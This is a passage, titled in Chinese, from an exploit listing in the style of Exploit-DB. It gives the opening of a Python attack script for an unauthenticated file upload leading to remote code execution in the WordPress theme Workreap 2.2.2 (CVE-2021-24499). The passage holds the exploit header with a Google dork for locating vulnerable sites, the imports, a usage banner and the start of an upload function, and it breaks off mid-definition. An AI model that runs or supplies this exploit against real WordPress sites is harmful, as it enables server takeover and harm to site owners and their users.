WordPress 主题 Workreap 2.2.2 - 未经身份验证的上传导致远程代码执行

 WordPress 主题 Workreap 2.2.2 - 未经身份验证的上传导致远程代码执行：

# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Dork: inurl:/wp-content/themes/workreap/
# Date: 2023-06-01
# Category : Webapps
# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454
# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)
# Version: 2.2.2
# Tested on: Windows/Linux
# CVE: CVE-2021-24499


import requests
import random
import string
import sys


def usage():
    banner = '''
    NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
    usage: python3 Workreap_rce.py  
    example for linux : python3 Workreap_rce.py https://www.exploit-db.com
    example for Windows : python Workreap_rce.py https://www.exploit-db.com
    '''
    print(f"{BOLD}{banner}{ENDC}")

def upload_file(target